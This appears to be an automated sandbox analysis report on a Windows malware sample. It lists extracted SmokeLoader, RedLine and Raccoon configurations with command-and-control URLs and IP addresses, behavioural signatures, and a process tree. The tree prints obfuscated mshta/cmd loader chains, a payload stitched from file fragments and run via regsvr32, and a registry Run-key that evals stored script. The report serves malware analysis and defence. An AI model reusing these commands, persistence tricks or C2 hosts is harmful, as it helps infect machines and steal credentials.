Analysis
-
max time kernel
152s -
max time network
145s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
13-11-2021 21:30
Static task
static1
Behavioral task
behavioral1
Sample
5ff88df448d441ea0f85ade6525f77b56a946c05837881a35c583911eeff90f8.exe
Resource
win10-en-20211104
General
-
Target
5ff88df448d441ea0f85ade6525f77b56a946c05837881a35c583911eeff90f8.exe
-
Size
316KB
-
MD5
d2f2bbd66e36c9c27c2ba79b9d78560f
-
SHA1
97056a8891c0b8f0ba9051d126e3020719ec18a7
-
SHA256
5ff88df448d441ea0f85ade6525f77b56a946c05837881a35c583911eeff90f8
-
SHA512
bb88668f16b121d2e3619b98181a46c29c85161417e23c9687da1d6f46118d3b688b6a123012b2d588425254e4bd711a18c10cb7cb4b28d58c076500edc7162e
Malware Config
Extracted
smokeloader
2020
http://host-file-host6.com/
http://host-host-file8.com/
http://srtuiyhuali.at/
http://fufuiloirtu.com/
http://amogohuigotuli.at/
http://novohudosovu.com/
http://brutuilionust.com/
http://bubushkalioua.com/
http://dumuilistrati.at/
http://verboliatsiaeeees.com/
Extracted
redline
185.159.80.90:38637
Extracted
redline
SuperStar
185.215.113.29:36224
Extracted
raccoon
1.8.3-hotfix
ddf183af4241e3172885cf1b2c4c1fb4ee03d05a
-
url4cnc
http://91.219.236.27/capibar
http://5.181.156.92/capibar
http://91.219.236.207/capibar
http://185.225.19.18/capibar
http://91.219.237.227/capibar
https://t.me/capibar
Extracted
raccoon
1.8.3-hotfix
675718a5f2ce6d3cacf6cb04a512f5637eae995f
-
url4cnc
http://91.219.236.27/agrybirdsgamerept
http://5.181.156.92/agrybirdsgamerept
http://91.219.236.207/agrybirdsgamerept
http://185.225.19.18/agrybirdsgamerept
http://91.219.237.227/agrybirdsgamerept
http://185.163.47.176/agrybirdsgamerept
Extracted
redline
imbest
45.153.186.153:56675
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 7 IoCs
resource yara_rule behavioral1/memory/480-152-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/480-153-0x0000000000418EEA-mapping.dmp family_redline behavioral1/memory/2132-170-0x00000000023A0000-0x00000000023BC000-memory.dmp family_redline behavioral1/memory/2132-172-0x0000000004E30000-0x0000000004E4B000-memory.dmp family_redline behavioral1/memory/3212-264-0x0000000004B30000-0x0000000004B5D000-memory.dmp family_redline behavioral1/memory/3212-266-0x0000000004BB0000-0x0000000004BDC000-memory.dmp family_redline behavioral1/memory/2484-285-0x0000000002B50000-0x0000000002BFE000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
description pid Process procid_target PID 4200 created 1416 4200 WerFault.exe 77 -
VKeylogger
A keylogger first seen in Nov 2020.
-
VKeylogger Payload 3 IoCs
resource yara_rule behavioral1/memory/1680-201-0x00000000001E0000-0x00000000001EF000-memory.dmp family_vkeylogger behavioral1/memory/1680-207-0x00000000001E3500-mapping.dmp family_vkeylogger behavioral1/memory/5056-210-0x0000000000BA0000-0x0000000000BAF000-memory.dmp family_vkeylogger -
suricata: ET MALWARE Likely Zbot Generic Request to gate.php Dotted-Quad
suricata: ET MALWARE Likely Zbot Generic Request to gate.php Dotted-Quad
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers
suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers
-
suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer
suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer
-
Downloads MZ/PE file
-
Executes dropped EXE 17 IoCs
pid Process 4424 3A5.exe 4416 81B.exe 816 A3F.exe 1060 1126.exe 1252 3A5.exe 1416 17AE.exe 480 81B.exe 2132 1126.exe 2704 2A4D.exe 4188 37DB.exe 4732 740.exe 2652 8FCF.exe 5064 SIOFYL_.eXE 2484 wgbvcud 2172 vgbvcud 3212 ABD4.exe 4360 wgbvcud -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Control Panel\International\Geo\Nation 740.exe -
Deletes itself 1 IoCs
pid Process 2236 Process not Found -
Loads dropped DLL 2 IoCs
pid Process 4928 regsvr32.exe 4928 regsvr32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\Run\gr5wd = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\Run\gtrhy = "C:\\Windows\\system32\\mshta.exe javascript:x=new%20ActiveXObject(\"wscript.shell\");v=x.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\SMSvcHost\\\\ComponentID\");eval(v);" explorer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 7 IoCs
description pid Process procid_target PID 4484 set thread context of 4340 4484 5ff88df448d441ea0f85ade6525f77b56a946c05837881a35c583911eeff90f8.exe 69 PID 4424 set thread context of 1252 4424 3A5.exe 76 PID 4416 set thread context of 480 4416 81B.exe 74 PID 1060 set thread context of 2132 1060 1126.exe 78 PID 4188 set thread context of 1680 4188 37DB.exe 84 PID 1680 set thread context of 5056 1680 RegSvcs.exe 85 PID 2484 set thread context of 4360 2484 wgbvcud 108 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 4200 1416 WerFault.exe 77 -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI A3F.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI vgbvcud Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI vgbvcud Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI wgbvcud Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI wgbvcud Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 5ff88df448d441ea0f85ade6525f77b56a946c05837881a35c583911eeff90f8.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 5ff88df448d441ea0f85ade6525f77b56a946c05837881a35c583911eeff90f8.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 5ff88df448d441ea0f85ade6525f77b56a946c05837881a35c583911eeff90f8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI A3F.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI A3F.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI vgbvcud Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI wgbvcud -
Kills process with taskkill 1 IoCs
pid Process 904 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4340 5ff88df448d441ea0f85ade6525f77b56a946c05837881a35c583911eeff90f8.exe 4340 5ff88df448d441ea0f85ade6525f77b56a946c05837881a35c583911eeff90f8.exe 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2236 Process not Found -
Suspicious behavior: MapViewOfSection 10 IoCs
pid Process 4340 5ff88df448d441ea0f85ade6525f77b56a946c05837881a35c583911eeff90f8.exe 816 A3F.exe 1680 RegSvcs.exe 5056 explorer.exe 2236 Process not Found 2236 Process not Found 2236 Process not Found 2236 Process not Found 2172 vgbvcud 4360 wgbvcud -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 2236 Process not Found Token: SeCreatePagefilePrivilege 2236 Process not Found Token: SeShutdownPrivilege 2236 Process not Found Token: SeCreatePagefilePrivilege 2236 Process not Found Token: SeShutdownPrivilege 2236 Process not Found Token: SeCreatePagefilePrivilege 2236 Process not Found Token: SeShutdownPrivilege 2236 Process not Found Token: SeCreatePagefilePrivilege 2236 Process not Found Token: SeShutdownPrivilege 2236 Process not Found Token: SeCreatePagefilePrivilege 2236 Process not Found Token: SeShutdownPrivilege 2236 Process not Found Token: SeCreatePagefilePrivilege 2236 Process not Found Token: SeShutdownPrivilege 2236 Process not Found Token: SeCreatePagefilePrivilege 2236 Process not Found Token: SeShutdownPrivilege 2236 Process not Found Token: SeCreatePagefilePrivilege 2236 Process not Found Token: SeRestorePrivilege 4200 WerFault.exe Token: SeBackupPrivilege 4200 WerFault.exe Token: SeDebugPrivilege 4200 WerFault.exe Token: SeShutdownPrivilege 2236 Process not Found Token: SeCreatePagefilePrivilege 2236 Process not Found Token: SeShutdownPrivilege 2236 Process not Found Token: SeCreatePagefilePrivilege 2236 Process not Found Token: SeDebugPrivilege 480 81B.exe Token: SeShutdownPrivilege 2236 Process not Found Token: SeCreatePagefilePrivilege 2236 Process not Found Token: SeShutdownPrivilege 2236 Process not Found Token: SeCreatePagefilePrivilege 2236 Process not Found Token: SeShutdownPrivilege 2236 Process not Found Token: SeCreatePagefilePrivilege 2236 Process not Found Token: SeDebugPrivilege 904 taskkill.exe Token: SeShutdownPrivilege 2236 Process not Found Token: SeCreatePagefilePrivilege 2236 Process not Found Token: SeShutdownPrivilege 2236 Process not Found Token: SeCreatePagefilePrivilege 2236 Process not Found Token: SeShutdownPrivilege 2236 Process not Found Token: SeCreatePagefilePrivilege 2236 Process not Found Token: SeShutdownPrivilege 2236 Process not Found Token: SeCreatePagefilePrivilege 2236 Process not Found Token: SeShutdownPrivilege 2236 Process not Found Token: SeCreatePagefilePrivilege 2236 Process not Found Token: SeShutdownPrivilege 2236 Process not Found Token: SeCreatePagefilePrivilege 2236 Process not Found Token: SeShutdownPrivilege 2236 Process not Found Token: SeCreatePagefilePrivilege 2236 Process not Found Token: SeShutdownPrivilege 2236 Process not Found Token: SeCreatePagefilePrivilege 2236 Process not Found Token: SeShutdownPrivilege 2236 Process not Found Token: SeCreatePagefilePrivilege 2236 Process not Found Token: SeShutdownPrivilege 2236 Process not Found Token: SeCreatePagefilePrivilege 2236 Process not Found Token: SeShutdownPrivilege 2236 Process not Found Token: SeCreatePagefilePrivilege 2236 Process not Found Token: SeShutdownPrivilege 2236 Process not Found Token: SeCreatePagefilePrivilege 2236 Process not Found Token: SeShutdownPrivilege 2236 Process not Found Token: SeCreatePagefilePrivilege 2236 Process not Found Token: SeShutdownPrivilege 2236 Process not Found Token: SeCreatePagefilePrivilege 2236 Process not Found Token: SeShutdownPrivilege 2236 Process not Found Token: SeCreatePagefilePrivilege 2236 Process not Found Token: SeShutdownPrivilege 2236 Process not Found Token: SeCreatePagefilePrivilege 2236 Process not Found Token: SeShutdownPrivilege 2236 Process not Found -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 5056 explorer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5056 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4484 wrote to memory of 4340 4484 5ff88df448d441ea0f85ade6525f77b56a946c05837881a35c583911eeff90f8.exe 69 PID 4484 wrote to memory of 4340 4484 5ff88df448d441ea0f85ade6525f77b56a946c05837881a35c583911eeff90f8.exe 69 PID 4484 wrote to memory of 4340 4484 5ff88df448d441ea0f85ade6525f77b56a946c05837881a35c583911eeff90f8.exe 69 PID 4484 wrote to memory of 4340 4484 5ff88df448d441ea0f85ade6525f77b56a946c05837881a35c583911eeff90f8.exe 69 PID 4484 wrote to memory of 4340 4484 5ff88df448d441ea0f85ade6525f77b56a946c05837881a35c583911eeff90f8.exe 69 PID 4484 wrote to memory of 4340 4484 5ff88df448d441ea0f85ade6525f77b56a946c05837881a35c583911eeff90f8.exe 69 PID 2236 wrote to memory of 4424 2236 Process not Found 70 PID 2236 wrote to memory of 4424 2236 Process not Found 70 PID 2236 wrote to memory of 4424 2236 Process not Found 70 PID 2236 wrote to memory of 4416 2236 Process not Found 71 PID 2236 wrote to memory of 4416 2236 Process not Found 71 PID 2236 wrote to memory of 4416 2236 Process not Found 71 PID 2236 wrote to memory of 816 2236 Process not Found 73 PID 2236 wrote to memory of 816 2236 Process not Found 73 PID 2236 wrote to memory of 816 2236 Process not Found 73 PID 4416 wrote to memory of 480 4416 81B.exe 74 PID 4416 wrote to memory of 480 4416 81B.exe 74 PID 4416 wrote to memory of 480 4416 81B.exe 74 PID 2236 wrote to memory of 1060 2236 Process not Found 75 PID 2236 wrote to memory of 1060 2236 Process not Found 75 PID 2236 wrote to memory of 1060 2236 Process not Found 75 PID 4424 wrote to memory of 1252 4424 3A5.exe 76 PID 4424 wrote to memory of 1252 4424 3A5.exe 76 PID 4424 wrote to memory of 1252 4424 3A5.exe 76 PID 4424 wrote to memory of 1252 4424 3A5.exe 76 PID 4424 wrote to memory of 1252 4424 3A5.exe 76 PID 4424 wrote to memory of 1252 4424 3A5.exe 76 PID 2236 wrote to memory of 1416 2236 Process not Found 77 PID 2236 wrote to memory of 1416 2236 Process not Found 77 PID 2236 wrote to memory of 1416 2236 Process not Found 77 PID 4416 wrote to memory of 480 4416 81B.exe 74 PID 4416 wrote to memory of 480 4416 81B.exe 74 PID 4416 wrote to memory of 480 4416 81B.exe 74 PID 4416 wrote to memory of 480 4416 81B.exe 74 PID 4416 wrote to memory of 480 4416 81B.exe 74 PID 1060 wrote to memory of 2132 1060 1126.exe 78 PID 1060 wrote to memory of 2132 1060 1126.exe 78 PID 1060 wrote to memory of 2132 1060 1126.exe 78 PID 1060 wrote to memory of 2132 1060 1126.exe 78 PID 1060 wrote to memory of 2132 1060 1126.exe 78 PID 1060 wrote to memory of 2132 1060 1126.exe 78 PID 1060 wrote to memory of 2132 1060 1126.exe 78 PID 1060 wrote to memory of 2132 1060 1126.exe 78 PID 1060 wrote to memory of 2132 1060 1126.exe 78 PID 2236 wrote to memory of 2704 2236 Process not Found 79 PID 2236 wrote to memory of 2704 2236 Process not Found 79 PID 2236 wrote to memory of 2704 2236 Process not Found 79 PID 2236 wrote to memory of 4188 2236 Process not Found 83 PID 2236 wrote to memory of 4188 2236 Process not Found 83 PID 2236 wrote to memory of 4188 2236 Process not Found 83 PID 4188 wrote to memory of 1680 4188 37DB.exe 84 PID 4188 wrote to memory of 1680 4188 37DB.exe 84 PID 4188 wrote to memory of 1680 4188 37DB.exe 84 PID 4188 wrote to memory of 1680 4188 37DB.exe 84 PID 4188 wrote to memory of 1680 4188 37DB.exe 84 PID 1680 wrote to memory of 5056 1680 RegSvcs.exe 85 PID 1680 wrote to memory of 5056 1680 RegSvcs.exe 85 PID 1680 wrote to memory of 5056 1680 RegSvcs.exe 85 PID 5056 wrote to memory of 4732 5056 explorer.exe 86 PID 5056 wrote to memory of 4732 5056 explorer.exe 86 PID 5056 wrote to memory of 4732 5056 explorer.exe 86 PID 2236 wrote to memory of 2652 2236 Process not Found 88 PID 2236 wrote to memory of 2652 2236 Process not Found 88 PID 2236 wrote to memory of 2652 2236 Process not Found 88 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\5ff88df448d441ea0f85ade6525f77b56a946c05837881a35c583911eeff90f8.exe"C:\Users\Admin\AppData\Local\Temp\5ff88df448d441ea0f85ade6525f77b56a946c05837881a35c583911eeff90f8.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4484 -
C:\Users\Admin\AppData\Local\Temp\5ff88df448d441ea0f85ade6525f77b56a946c05837881a35c583911eeff90f8.exe"C:\Users\Admin\AppData\Local\Temp\5ff88df448d441ea0f85ade6525f77b56a946c05837881a35c583911eeff90f8.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4340
-
-
C:\Users\Admin\AppData\Local\Temp\3A5.exeC:\Users\Admin\AppData\Local\Temp\3A5.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4424 -
C:\Users\Admin\AppData\Local\Temp\3A5.exeC:\Users\Admin\AppData\Local\Temp\3A5.exe2⤵
- Executes dropped EXE
PID:1252
-
-
C:\Users\Admin\AppData\Local\Temp\81B.exeC:\Users\Admin\AppData\Local\Temp\81B.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4416 -
C:\Users\Admin\AppData\Local\Temp\81B.exeC:\Users\Admin\AppData\Local\Temp\81B.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:480
-
-
C:\Users\Admin\AppData\Local\Temp\A3F.exeC:\Users\Admin\AppData\Local\Temp\A3F.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:816
-
C:\Users\Admin\AppData\Local\Temp\1126.exeC:\Users\Admin\AppData\Local\Temp\1126.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Users\Admin\AppData\Local\Temp\1126.exeC:\Users\Admin\AppData\Local\Temp\1126.exe2⤵
- Executes dropped EXE
PID:2132
-
-
C:\Users\Admin\AppData\Local\Temp\17AE.exeC:\Users\Admin\AppData\Local\Temp\17AE.exe1⤵
- Executes dropped EXE
PID:1416 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1416 -s 6762⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4200
-
-
C:\Users\Admin\AppData\Local\Temp\2A4D.exeC:\Users\Admin\AppData\Local\Temp\2A4D.exe1⤵
- Executes dropped EXE
PID:2704
-
C:\Users\Admin\AppData\Local\Temp\37DB.exeC:\Users\Admin\AppData\Local\Temp\37DB.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4188 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"3⤵
- Adds Run key to start application
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5056 -
C:\Users\Admin\AppData\Local\Temp\740.exe"C:\Users\Admin\AppData\Local\Temp\740.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
PID:4732
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\8FCF.exeC:\Users\Admin\AppData\Local\Temp\8FCF.exe1⤵
- Executes dropped EXE
PID:2652 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRiPt: cLoSE ( CreaTEObJect("WSCrIpt.ShElL" ).Run ( "CMd.EXe /Q/c COPY /Y ""C:\Users\Admin\AppData\Local\Temp\8FCF.exe"" ..\SIOFYL_.eXE && sTarT ..\SioFyL_.exE /PqgNvw4IlDLT7hpq3_wecIlKVwsIMk &IF """"== """" for %S IN ( ""C:\Users\Admin\AppData\Local\Temp\8FCF.exe"" ) do taskkill -f /iM ""%~NXS"" " , 0 , TrUE ))2⤵PID:2664
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q/c COPY /Y "C:\Users\Admin\AppData\Local\Temp\8FCF.exe" ..\SIOFYL_.eXE && sTarT ..\SioFyL_.exE /PqgNvw4IlDLT7hpq3_wecIlKVwsIMk &IF ""== "" for %S IN ("C:\Users\Admin\AppData\Local\Temp\8FCF.exe" ) do taskkill -f /iM "%~NXS"3⤵PID:2988
-
C:\Users\Admin\AppData\Local\Temp\SIOFYL_.eXE..\SioFyL_.exE /PqgNvw4IlDLT7hpq3_wecIlKVwsIMk4⤵
- Executes dropped EXE
PID:5064 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRiPt: cLoSE ( CreaTEObJect("WSCrIpt.ShElL" ).Run ( "CMd.EXe /Q/c COPY /Y ""C:\Users\Admin\AppData\Local\Temp\SIOFYL_.eXE"" ..\SIOFYL_.eXE && sTarT ..\SioFyL_.exE /PqgNvw4IlDLT7hpq3_wecIlKVwsIMk &IF ""/PqgNvw4IlDLT7hpq3_wecIlKVwsIMk ""== """" for %S IN ( ""C:\Users\Admin\AppData\Local\Temp\SIOFYL_.eXE"" ) do taskkill -f /iM ""%~NXS"" " , 0 , TrUE ))5⤵PID:3792
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q/c COPY /Y "C:\Users\Admin\AppData\Local\Temp\SIOFYL_.eXE" ..\SIOFYL_.eXE && sTarT ..\SioFyL_.exE /PqgNvw4IlDLT7hpq3_wecIlKVwsIMk &IF "/PqgNvw4IlDLT7hpq3_wecIlKVwsIMk "== "" for %S IN ("C:\Users\Admin\AppData\Local\Temp\SIOFYL_.eXE" ) do taskkill -f /iM "%~NXS"6⤵PID:1712
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbscrIPT: cLOSE(cREateObJeCt( "wscRiPt.SHELl"). Run ("cMd /r Echo | set /P = ""MZ"" > V_DXQ.No & COPY /y /b V_dXQ.NO +WX0Cjy.A + BPROiU.ZB +oWfJ6VGN.C+ Yg_AN9.GRP ..\CXSXSHYX.ZBV & STARt regsvr32 ..\CxSXSHYX.ZBV -s & dEL /q * " ,0 ,tRuE ) )5⤵PID:2160
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r Echo | set /P = "MZ" > V_DXQ.No & COPY /y /b V_dXQ.NO +WX0Cjy.A + BPROiU.ZB +oWfJ6VGN.C+ Yg_AN9.GRP ..\CXSXSHYX.ZBV & STARt regsvr32 ..\CxSXSHYX.ZBV -s & dEL /q *6⤵PID:3500
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Echo "7⤵PID:2940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>V_DXQ.No"7⤵PID:3244
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 ..\CxSXSHYX.ZBV -s7⤵
- Loads dropped DLL
PID:4928
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f /iM "8FCF.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:904
-
-
-
-
C:\Users\Admin\AppData\Roaming\wgbvcudC:\Users\Admin\AppData\Roaming\wgbvcud1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2484 -
C:\Users\Admin\AppData\Roaming\wgbvcudC:\Users\Admin\AppData\Roaming\wgbvcud2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4360
-
-
C:\Users\Admin\AppData\Roaming\vgbvcudC:\Users\Admin\AppData\Roaming\vgbvcud1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2172
-
C:\Users\Admin\AppData\Local\Temp\ABD4.exeC:\Users\Admin\AppData\Local\Temp\ABD4.exe1⤵
- Executes dropped EXE
PID:3212
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:3132
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:4604